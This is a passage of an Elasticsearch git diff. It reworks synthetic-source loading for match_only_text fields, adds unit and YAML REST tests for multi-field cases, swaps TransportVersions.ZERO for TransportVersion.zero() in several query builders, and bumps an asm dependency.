iae.getMessage()); assertTrue("Does not fail inside ClassValue.computeValue()", Arrays.stream(iae.getStackTrace()).anyMatch(e -> { return e.getMethodName().equals("computeValue") && e.getClassName().startsWith("org.elasticsearch.painless.DefBootstrap$PIC$"); diff --git a/modules/mapper-extras/src/main/java/org/elasticsearch/index/mapper/extras/MatchOnlyTextFieldMapper.java b/modules/mapper-extras/src/main/java/org/elasticsearch/index/mapper/extras/MatchOnlyTextFieldMapper.java index 61abda3aeb16e..faea13dac4e31 100644 --- a/modules/mapper-extras/src/main/java/org/elasticsearch/index/mapper/extras/MatchOnlyTextFieldMapper.java +++ b/modules/mapper-extras/src/main/java/org/elasticsearch/index/mapper/extras/MatchOnlyTextFieldMapper.java @@ -34,19 +34,21 @@ import org.elasticsearch.common.text.UTF8DecodingReader; import org.elasticsearch.common.unit.Fuzziness; import org.elasticsearch.index.IndexVersion; +import org.elasticsearch.index.IndexVersions; import org.elasticsearch.index.analysis.IndexAnalyzers; import org.elasticsearch.index.analysis.NamedAnalyzer; import org.elasticsearch.index.fielddata.FieldDataContext; import org.elasticsearch.index.fielddata.IndexFieldData; import org.elasticsearch.index.fielddata.SourceValueFetcherSortedBinaryIndexFieldData; import org.elasticsearch.index.fielddata.StoredFieldSortedBinaryIndexFieldData; -import org.elasticsearch.index.fieldvisitor.LeafStoredFieldLoader; import org.elasticsearch.index.fieldvisitor.StoredFieldLoader; import org.elasticsearch.index.mapper.BlockLoader; import org.elasticsearch.index.mapper.BlockSourceReader; import org.elasticsearch.index.mapper.BlockStoredFieldsReader; import org.elasticsearch.index.mapper.DocumentParserContext; import org.elasticsearch.index.mapper.FieldMapper; +import org.elasticsearch.index.mapper.KeywordFieldMapper; +import org.elasticsearch.index.mapper.MappedFieldType; import org.elasticsearch.index.mapper.MapperBuilderContext; import org.elasticsearch.index.mapper.SourceValueFetcher; import org.elasticsearch.index.mapper.StringFieldType; @@ -105,8 +107,15 @@ public static class Builder extends FieldMapper.Builder { private final TextParams.Analyzers analyzers; private final boolean withinMultiField; + private final boolean storedFieldInBinaryFormat; - public Builder(String name, IndexVersion indexCreatedVersion, IndexAnalyzers indexAnalyzers, boolean withinMultiField) { + public Builder( + String name, + IndexVersion indexCreatedVersion, + IndexAnalyzers indexAnalyzers, + boolean withinMultiField, + boolean storedFieldInBinaryFormat + ) { super(name); this.indexCreatedVersion = indexCreatedVersion; this.analyzers = new TextParams.Analyzers( @@ -116,6 +125,7 @@ public Builder(String name, IndexVersion indexCreatedVersion, IndexAnalyzers ind indexCreatedVersion ); this.withinMultiField = withinMultiField; + this.storedFieldInBinaryFormat = storedFieldInBinaryFormat; } @Override @@ -133,7 +143,10 @@ private MatchOnlyTextFieldType buildFieldType(MapperBuilderContext context) { tsi, indexAnalyzer, context.isSourceSynthetic(), - meta.getValue() + meta.getValue(), + withinMultiField, + multiFieldsBuilder.hasSyntheticSourceCompatibleKeywordField(), + storedFieldInBinaryFormat ); return ft; } @@ -153,8 +166,22 @@ public MatchOnlyTextFieldMapper build(MapperBuilderContext context) { } } + private static boolean isSyntheticSourceStoredFieldInBinaryFormat(IndexVersion indexCreatedVersion) { + return indexCreatedVersion.onOrAfter(IndexVersions.MATCH_ONLY_TEXT_STORED_AS_BYTES) + || indexCreatedVersion.between( + IndexVersions.MATCH_ONLY_TEXT_STORED_AS_BYTES_BACKPORT_8_X, + IndexVersions.UPGRADE_TO_LUCENE_10_0_0 + ); + } + public static final TypeParser PARSER = new TypeParser( - (n, c) -> new Builder(n, c.indexVersionCreated(), c.getIndexAnalyzers(), c.isWithinMultiField()) + (n, c) -> new Builder( + n, + c.indexVersionCreated(), + c.getIndexAnalyzers(), + c.isWithinMultiField(), + isSyntheticSourceStoredFieldInBinaryFormat(c.indexVersionCreated()) + ) ); public static class MatchOnlyTextFieldType extends StringFieldType { @@ -163,17 +190,27 @@ public static class MatchOnlyTextFieldType extends StringFieldType { private final TextFieldType textFieldType; private final String originalName; + private final boolean withinMultiField; + private final boolean hasCompatibleMultiFields; + private final boolean storedFieldInBinaryFormat; + public MatchOnlyTextFieldType( String name, TextSearchInfo tsi, Analyzer indexAnalyzer, boolean isSyntheticSource, - Map meta + Map meta, + boolean withinMultiField, + boolean hasCompatibleMultiFields, + boolean storedFieldInBinaryFormat ) { super(name, true, false, false, tsi, meta); this.indexAnalyzer = Objects.requireNonNull(indexAnalyzer); this.textFieldType = new TextFieldType(name, isSyntheticSource); this.originalName = isSyntheticSource ? name + "._original" : null; + this.withinMultiField = withinMultiField; + this.hasCompatibleMultiFields = hasCompatibleMultiFields; + this.storedFieldInBinaryFormat = storedFieldInBinaryFormat; } public MatchOnlyTextFieldType(String name) { @@ -182,7 +219,10 @@ public MatchOnlyTextFieldType(String name) { new TextSearchInfo(Defaults.FIELD_TYPE, null, Lucene.STANDARD_ANALYZER, Lucene.STANDARD_ANALYZER), Lucene.STANDARD_ANALYZER, false, - Collections.emptyMap() + Collections.emptyMap(), + false, + false, + false ); } @@ -209,16 +249,58 @@ private IOFunction, IOExcepti "Field [" + name() + "] of type [" + CONTENT_TYPE + "] cannot run positional queries since [_source] is disabled." ); } - if (searchExecutionContext.isSourceSynthetic()) { + if (searchExecutionContext.isSourceSynthetic() && withinMultiField) { + String parentField = searchExecutionContext.parentPath(name()); + var parent = searchExecutionContext.lookup().fieldType(parentField); + + if (parent instanceof KeywordFieldMapper.KeywordFieldType keywordParent + && keywordParent.ignoreAbove() != Integer.MAX_VALUE) { + if (parent.isStored()) { + return storedFieldFetcher(parentField, keywordParent.originalName()); + } else if (parent.hasDocValues()) { + var ifd = searchExecutionContext.getForField(parent, MappedFieldType.FielddataOperation.SEARCH); + return combineFieldFetchers(docValuesFieldFetcher(ifd), storedFieldFetcher(keywordParent.originalName())); + } + } + + if (parent.isStored()) { + return storedFieldFetcher(parentField); + } else if (parent.hasDocValues()) { + var ifd = searchExecutionContext.getForField(parent, MappedFieldType.FielddataOperation.SEARCH); + return docValuesFieldFetcher(ifd); + } else { + assert false : "parent field should either be stored or have doc values"; + } + } else if (searchExecutionContext.isSourceSynthetic() && hasCompatibleMultiFields) { + var mapper = (MatchOnlyTextFieldMapper) searchExecutionContext.getMappingLookup().getMapper(name()); + var kwd = TextFieldMapper.SyntheticSourceHelper.getKeywordFieldMapperForSyntheticSource(mapper); + + if (kwd != null) { + var fieldType = kwd.fieldType(); + + if (fieldType.ignoreAbove() != Integer.MAX_VALUE) { + if (fieldType.isStored()) { + return storedFieldFetcher(fieldType.name(), fieldType.originalName()); + } else if (fieldType.hasDocValues()) { + var ifd = searchExecutionContext.getForField(fieldType, MappedFieldType.FielddataOperation.SEARCH); + return combineFieldFetchers(docValuesFieldFetcher(ifd), storedFieldFetcher(fieldType.originalName())); + } + } + + if (fieldType.isStored()) { + return storedFieldFetcher(fieldType.name()); + } else if (fieldType.hasDocValues()) { + var ifd = searchExecutionContext.getForField(fieldType, MappedFieldType.FielddataOperation.SEARCH); + return docValuesFieldFetcher(ifd); + } else { + assert false : "multi field should either be stored or have doc values"; + } + } else { + assert false : "multi field of type keyword should exist"; + } + } else if (searchExecutionContext.isSourceSynthetic()) { String name = storedFieldNameForSyntheticSource(); - StoredFieldLoader loader = StoredFieldLoader.create(false, Set.of(name)); - return context -> { - LeafStoredFieldLoader leafLoader = loader.getLoader(context, null); - return docId -> { - leafLoader.advanceTo(docId); - return leafLoader.storedFields().get(name); - }; - }; + return storedFieldFetcher(name); } return context -> { ValueFetcher valueFetcher = valueFetcher(searchExecutionContext, null); @@ -234,6 +316,75 @@ private IOFunction, IOExcepti }; } + private static IOFunction, IOException>> docValuesFieldFetcher( + IndexFieldData ifd + ) { + return context -> { + var sortedBinaryDocValues = ifd.load(context).getBytesValues(); + return docId -> { + if (sortedBinaryDocValues.advanceExact(docId)) { + var values = new ArrayList<>(sortedBinaryDocValues.docValueCount()); + for (int i = 0; i < sortedBinaryDocValues.docValueCount(); i++) { + values.add(sortedBinaryDocValues.nextValue().utf8ToString()); + } + return values; + } else { + return List.of(); + } + }; + }; + } + + private static IOFunction, IOException>> storedFieldFetcher(String... names) { + var loader = StoredFieldLoader.create(false, Set.of(names)); + return context -> { + var leafLoader = loader.getLoader(context, null); + return docId -> { + leafLoader.advanceTo(docId); + var storedFields = leafLoader.storedFields(); + if (names.length == 1) { + return storedFields.get(names[0]); + } + + List values = new ArrayList<>(); + for (var name : names) { + var currValues = storedFields.get(name); + if (currValues != null) { + values.addAll(currValues); + } + } + + return values; + }; + }; + } + + private static IOFunction, IOException>> combineFieldFetchers( + IOFunction, IOException>> primaryFetcher, + IOFunction, IOException>> secondaryFetcher + ) { + return context -> { + var primaryGetter = primaryFetcher.apply(context); + var secondaryGetter = secondaryFetcher.apply(context); + return docId -> { + List values = new ArrayList<>(); + var primary = primaryGetter.apply(docId); + if (primary != null) { + values.addAll(primary); + } + + var secondary = secondaryGetter.apply(docId); + if (secondary != null) { + values.addAll(secondary); + } + + assert primary != null || secondary != null; + + return values; + }; + }; + } + private Query toQuery(Query query, SearchExecutionContext searchExecutionContext) { return new ConstantScoreQuery( new SourceConfirmedTextQuery(query, getValueFetcherProvider(searchExecutionContext), indexAnalyzer) @@ -362,10 +513,42 @@ public Query phrasePrefixQuery(TokenStream stream, int slop, int maxExpansions, return toQuery(query, queryShardContext); } + private static class BytesFromMixedStringsBytesRefBlockLoader extends BlockStoredFieldsReader.StoredFieldsBlockLoader { + BytesFromMixedStringsBytesRefBlockLoader(String field) { + super(field); + } + + @Override + public Builder builder(BlockFactory factory, int expectedCount) { + return factory.bytesRefs(expectedCount); + } + + @Override + public RowStrideReader rowStrideReader(LeafReaderContext context) throws IOException { + return new BlockStoredFieldsReader.Bytes(field) { + private final BytesRef scratch = new BytesRef(); + + @Override + protected BytesRef toBytesRef(Object v) { + if (v instanceof BytesRef b) { + return b; + } else { + assert v instanceof String; + return BlockSourceReader.toBytesRef(scratch, v.toString()); + } + } + }; + } + } + @Override public BlockLoader blockLoader(BlockLoaderContext blContext) { if (textFieldType.isSyntheticSource()) { - return new BlockStoredFieldsReader.BytesFromBytesRefsBlockLoader(storedFieldNameForSyntheticSource()); + if (storedFieldInBinaryFormat) { + return new BlockStoredFieldsReader.BytesFromBytesRefsBlockLoader(storedFieldNameForSyntheticSource()); + } else { + return new BytesFromMixedStringsBytesRefBlockLoader(storedFieldNameForSyntheticSource()); + } } SourceValueFetcher fetcher = SourceValueFetcher.toString(blContext.sourcePaths(name())); // MatchOnlyText never has norms, so we have to use the field names field @@ -386,7 +569,12 @@ public IndexFieldData.Builder fielddataBuilder(FieldDataContext fieldDataContext ) { @Override protected BytesRef storedToBytesRef(Object stored) { - return (BytesRef) stored; + if (stored instanceof BytesRef storedBytes) { + return storedBytes; + } else { + assert stored instanceof String; + return new BytesRef(stored.toString()); + } } }; } @@ -411,6 +599,7 @@ private String storedFieldNameForSyntheticSource() { private final boolean storeSource; private final FieldType fieldType; private final boolean withinMultiField; + private final boolean storedFieldInBinaryFormat; private MatchOnlyTextFieldMapper( String simpleName, @@ -430,6 +619,7 @@ private MatchOnlyTextFieldMapper( this.positionIncrementGap = builder.analyzers.positionIncrementGap.getValue(); this.storeSource = storeSource; this.withinMultiField = builder.withinMultiField; + this.storedFieldInBinaryFormat = builder.storedFieldInBinaryFormat; } @Override @@ -439,7 +629,7 @@ public Map indexAnalyzers() { @Override public FieldMapper.Builder getMergeBuilder() { - return new Builder(leafName(), indexCreatedVersion, indexAnalyzers, withinMultiField).init(this); + return new Builder(leafName(), indexCreatedVersion, indexAnalyzers, withinMultiField, storedFieldInBinaryFormat).init(this); } @Override @@ -456,8 +646,12 @@ protected void parseCreateField(DocumentParserContext context) throws IOExceptio context.addToFieldNames(fieldType().name()); if (storeSource) { - final var bytesRef = new BytesRef(utfBytes.bytes(), utfBytes.offset(), utfBytes.length()); - context.doc().add(new StoredField(fieldType().storedFieldNameForSyntheticSource(), bytesRef)); + if (storedFieldInBinaryFormat) { + final var bytesRef = new BytesRef(utfBytes.bytes(), utfBytes.offset(), utfBytes.length()); + context.doc().add(new StoredField(fieldType().storedFieldNameForSyntheticSource(), bytesRef)); + } else { + context.doc().add(new StoredField(fieldType().storedFieldNameForSyntheticSource(), value.string())); + } } } @@ -473,13 +667,27 @@ public MatchOnlyTextFieldType fieldType() { @Override protected SyntheticSourceSupport syntheticSourceSupport() { - return new SyntheticSourceSupport.Native( - () -> new StringStoredFieldFieldLoader(fieldType().storedFieldNameForSyntheticSource(), fieldType().name(), leafName()) { - @Override - protected void write(XContentBuilder b, Object value) throws IOException { - b.value(((BytesRef) value).utf8ToString()); + if (storeSource) { + return new SyntheticSourceSupport.Native( + () -> new StringStoredFieldFieldLoader(fieldType().storedFieldNameForSyntheticSource(), fieldType().name(), leafName()) { + @Override + protected void write(XContentBuilder b, Object value) throws IOException { + if (value instanceof BytesRef valueBytes) { + b.value(valueBytes.utf8ToString()); + } else { + assert value instanceof String; + b.value(value.toString()); + } + } } + ); + } else { + var kwd = TextFieldMapper.SyntheticSourceHelper.getKeywordFieldMapperForSyntheticSource(this); + if (kwd != null) { + return new SyntheticSourceSupport.Native(() -> kwd.syntheticFieldLoader(fullPath(), leafName())); } - ); + assert false : "there should be a suite field mapper with native synthetic source support"; + return super.syntheticSourceSupport(); + } } } diff --git a/modules/mapper-extras/src/main/java/org/elasticsearch/index/mapper/extras/RankFeatureQueryBuilder.java b/modules/mapper-extras/src/main/java/org/elasticsearch/index/mapper/extras/RankFeatureQueryBuilder.java index 61b8322e4732d..6ccd52fb78e51 100644 --- a/modules/mapper-extras/src/main/java/org/elasticsearch/index/mapper/extras/RankFeatureQueryBuilder.java +++ b/modules/mapper-extras/src/main/java/org/elasticsearch/index/mapper/extras/RankFeatureQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.search.MatchNoDocsQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.mapper.MappedFieldType; @@ -416,6 +415,6 @@ protected int doHashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/mapper-extras/src/test/java/org/elasticsearch/index/mapper/extras/MatchOnlyTextFieldMapperTests.java b/modules/mapper-extras/src/test/java/org/elasticsearch/index/mapper/extras/MatchOnlyTextFieldMapperTests.java index f427c6c1b7c07..ef72e234f8d6b 100644 --- a/modules/mapper-extras/src/test/java/org/elasticsearch/index/mapper/extras/MatchOnlyTextFieldMapperTests.java +++ b/modules/mapper-extras/src/test/java/org/elasticsearch/index/mapper/extras/MatchOnlyTextFieldMapperTests.java @@ -10,6 +10,9 @@ package org.elasticsearch.index.mapper.extras; import org.apache.lucene.analysis.TokenStream; +import org.apache.lucene.document.Field; +import org.apache.lucene.document.StoredField; +import org.apache.lucene.document.StringField; import org.apache.lucene.index.DirectoryReader; import org.apache.lucene.index.DocValuesType; import org.apache.lucene.index.IndexOptions; @@ -21,9 +24,12 @@ import org.apache.lucene.tests.analysis.CannedTokenStream; import org.apache.lucene.tests.analysis.Token; import org.apache.lucene.tests.index.RandomIndexWriter; +import org.apache.lucene.util.BytesRef; import org.elasticsearch.common.Strings; +import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.Tuple; import org.elasticsearch.index.IndexSettings; +import org.elasticsearch.index.IndexVersions; import org.elasticsearch.index.mapper.DocumentMapper; import org.elasticsearch.index.mapper.KeywordFieldMapper; import org.elasticsearch.index.mapper.LuceneDocument; @@ -350,4 +356,33 @@ public void testStoreParameterDefaultsSyntheticSourceTextFieldIsMultiField() thr assertThat(fields, empty()); } } + + public void testLoadSyntheticSourceFromStringOrBytesRef() throws IOException { + var mappings = mapping(b -> { + b.startObject("field1").field("type", "match_only_text").endObject(); + b.startObject("field2").field("type", "match_only_text").endObject(); + }); + var settings = Settings.builder().put("index.mapping.source.mode", "synthetic").build(); + DocumentMapper mapper = createMapperService(IndexVersions.UPGRADE_TO_LUCENE_10_2_2, settings, () -> true, mappings) + .documentMapper(); + + try (Directory directory = newDirectory()) { + RandomIndexWriter iw = indexWriterForSyntheticSource(directory); + + LuceneDocument document = new LuceneDocument(); + document.add(new StringField("field1", "foo", Field.Store.NO)); + document.add(new StoredField("field1._original", "foo")); + + document.add(new StringField("field2", "bar", Field.Store.NO)); + document.add(new StoredField("field2._original", new BytesRef("bar"))); + + iw.addDocument(document); + iw.close(); + + try (DirectoryReader indexReader = wrapInMockESDirectoryReader(DirectoryReader.open(directory))) { + String syntheticSource = syntheticSource(mapper, null, indexReader, 0); + assertEquals("{\"field1\":\"foo\",\"field2\":\"bar\"}", syntheticSource); + } + } + } } diff --git a/modules/mapper-extras/src/yamlRestTest/resources/rest-api-spec/test/match_only_text/10_basic.yml b/modules/mapper-extras/src/yamlRestTest/resources/rest-api-spec/test/match_only_text/10_basic.yml index 821ab46b1bd64..48a596ef14c72 100644 --- a/modules/mapper-extras/src/yamlRestTest/resources/rest-api-spec/test/match_only_text/10_basic.yml +++ b/modules/mapper-extras/src/yamlRestTest/resources/rest-api-spec/test/match_only_text/10_basic.yml @@ -394,4 +394,345 @@ synthetic_source with copy_to: - match: hits.hits.0.fields.copy.0: "Apache Lucene powers Elasticsearch" +--- +synthetic_source match_only_text as multi-field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: keyword + fields: + text: + type: match_only_text + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo.text: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" + +--- +synthetic_source match_only_text as multi-field with ignored keyword as parent: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: keyword + store: false + doc_values: true + ignore_above: 10 + fields: + text: + type: match_only_text + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: [ "Apache Lucene powers Elasticsearch", "Apache" ] + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo.text: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: [ "Apache", "Apache Lucene powers Elasticsearch" ] + +--- +synthetic_source match_only_text as multi-field with stored keyword as parent: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: keyword + store: true + doc_values: false + fields: + text: + type: match_only_text + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo.text: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" + +--- +synthetic_source match_only_text as multi-field with ignored stored keyword as parent: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: keyword + store: true + doc_values: false + ignore_above: 10 + fields: + text: + type: match_only_text + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo.text: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" +--- +synthetic_source match_only_text with multi-field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: match_only_text + fields: + raw: + type: keyword + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" + +--- +synthetic_source match_only_text with ignored multi-field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: match_only_text + fields: + raw: + type: keyword + store: false + doc_values: true + ignore_above: 10 + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" + +--- +synthetic_source match_only_text with stored multi-field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: match_only_text + fields: + raw: + type: keyword + store: true + doc_values: false + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" + +--- +synthetic_source match_only_text with ignored stored multi-field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: match_only_text + fields: + raw: + type: keyword + store: true + doc_values: false + ignore_above: 10 + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" diff --git a/modules/parent-join/src/main/java/org/elasticsearch/join/aggregations/ChildrenAggregationBuilder.java b/modules/parent-join/src/main/java/org/elasticsearch/join/aggregations/ChildrenAggregationBuilder.java index 71945ad395157..11dbaf7995248 100644 --- a/modules/parent-join/src/main/java/org/elasticsearch/join/aggregations/ChildrenAggregationBuilder.java +++ b/modules/parent-join/src/main/java/org/elasticsearch/join/aggregations/ChildrenAggregationBuilder.java @@ -11,7 +11,6 @@ import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -177,6 +176,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/parent-join/src/main/java/org/elasticsearch/join/aggregations/ParentAggregationBuilder.java b/modules/parent-join/src/main/java/org/elasticsearch/join/aggregations/ParentAggregationBuilder.java index 881b22c8dfa22..7551734d09e84 100644 --- a/modules/parent-join/src/main/java/org/elasticsearch/join/aggregations/ParentAggregationBuilder.java +++ b/modules/parent-join/src/main/java/org/elasticsearch/join/aggregations/ParentAggregationBuilder.java @@ -11,7 +11,6 @@ import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -181,6 +180,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/parent-join/src/main/java/org/elasticsearch/join/query/HasChildQueryBuilder.java b/modules/parent-join/src/main/java/org/elasticsearch/join/query/HasChildQueryBuilder.java index e2c93f4cad37a..137923a164848 100644 --- a/modules/parent-join/src/main/java/org/elasticsearch/join/query/HasChildQueryBuilder.java +++ b/modules/parent-join/src/main/java/org/elasticsearch/join/query/HasChildQueryBuilder.java @@ -20,7 +20,6 @@ import org.apache.lucene.search.similarities.Similarity; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -543,6 +542,6 @@ protected void extractInnerHitBuilders(Map inner @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/parent-join/src/main/java/org/elasticsearch/join/query/HasParentQueryBuilder.java b/modules/parent-join/src/main/java/org/elasticsearch/join/query/HasParentQueryBuilder.java index fc15bb55f8703..c95e7eaa29fce 100644 --- a/modules/parent-join/src/main/java/org/elasticsearch/join/query/HasParentQueryBuilder.java +++ b/modules/parent-join/src/main/java/org/elasticsearch/join/query/HasParentQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.search.join.ScoreMode; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -315,6 +314,6 @@ protected void extractInnerHitBuilders(Map inner @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/parent-join/src/main/java/org/elasticsearch/join/query/ParentIdQueryBuilder.java b/modules/parent-join/src/main/java/org/elasticsearch/join/query/ParentIdQueryBuilder.java index 8ed22edec42e2..073a231bb8ce7 100644 --- a/modules/parent-join/src/main/java/org/elasticsearch/join/query/ParentIdQueryBuilder.java +++ b/modules/parent-join/src/main/java/org/elasticsearch/join/query/ParentIdQueryBuilder.java @@ -17,7 +17,6 @@ import org.apache.lucene.search.TermQuery; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -195,6 +194,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/percolator/src/main/java/org/elasticsearch/percolator/PercolateQueryBuilder.java b/modules/percolator/src/main/java/org/elasticsearch/percolator/PercolateQueryBuilder.java index c150f01153d35..468836232771e 100644 --- a/modules/percolator/src/main/java/org/elasticsearch/percolator/PercolateQueryBuilder.java +++ b/modules/percolator/src/main/java/org/elasticsearch/percolator/PercolateQueryBuilder.java @@ -648,6 +648,6 @@ public void addNamedQuery(String name, Query query) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/percolator/src/test/java/org/elasticsearch/percolator/PercolatorFieldMapperTests.java b/modules/percolator/src/test/java/org/elasticsearch/percolator/PercolatorFieldMapperTests.java index f72c68c6fd2e3..98af21b3877f5 100644 --- a/modules/percolator/src/test/java/org/elasticsearch/percolator/PercolatorFieldMapperTests.java +++ b/modules/percolator/src/test/java/org/elasticsearch/percolator/PercolatorFieldMapperTests.java @@ -32,7 +32,6 @@ import org.apache.lucene.search.join.ScoreMode; import org.apache.lucene.util.BytesRef; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.support.PlainActionFuture; import org.elasticsearch.common.Strings; import org.elasticsearch.common.bytes.BytesArray; @@ -1212,7 +1211,7 @@ protected boolean doEquals(CustomParserQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/modules/repository-azure/build.gradle b/modules/repository-azure/build.gradle index 032b4e9c56319..4e0097905f09e 100644 --- a/modules/repository-azure/build.gradle +++ b/modules/repository-azure/build.gradle @@ -76,7 +76,7 @@ dependencies { api "net.minidev:accessors-smart:2.5.2" api "net.minidev:json-smart:2.5.2" api "org.codehaus.woodstox:stax2-api:4.2.2" - api "org.ow2.asm:asm:9.7.1" + api "org.ow2.asm:asm:9.8" runtimeOnly "com.google.code.gson:gson:2.11.0" runtimeOnly "org.cryptomator:siv-mode:1.5.2" diff --git a/modules/repository-azure/src/internalClusterTest/java/org/elasticsearch/repositories/azure/AzureBlobStoreRepositoryTests.java b/modules/repository-azure/src/internalClusterTest/java/org/elasticsearch/repositories/azure/AzureBlobStoreRepositoryTests.java index c6c1868d5bbc1..493f4d10eea6d 100644 --- a/modules/repository-azure/src/internalClusterTest/java/org/elasticsearch/repositories/azure/AzureBlobStoreRepositoryTests.java +++ b/modules/repository-azure/src/internalClusterTest/java/org/elasticsearch/repositories/azure/AzureBlobStoreRepositoryTests.java @@ -41,6 +41,7 @@ import org.elasticsearch.telemetry.Measurement; import org.elasticsearch.telemetry.TestTelemetryPlugin; import org.elasticsearch.test.BackgroundIndexer; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.threadpool.ThreadPool; import java.io.ByteArrayInputStream; @@ -73,6 +74,7 @@ import static org.hamcrest.Matchers.is; @SuppressForbidden(reason = "this test uses a HttpServer to emulate an Azure 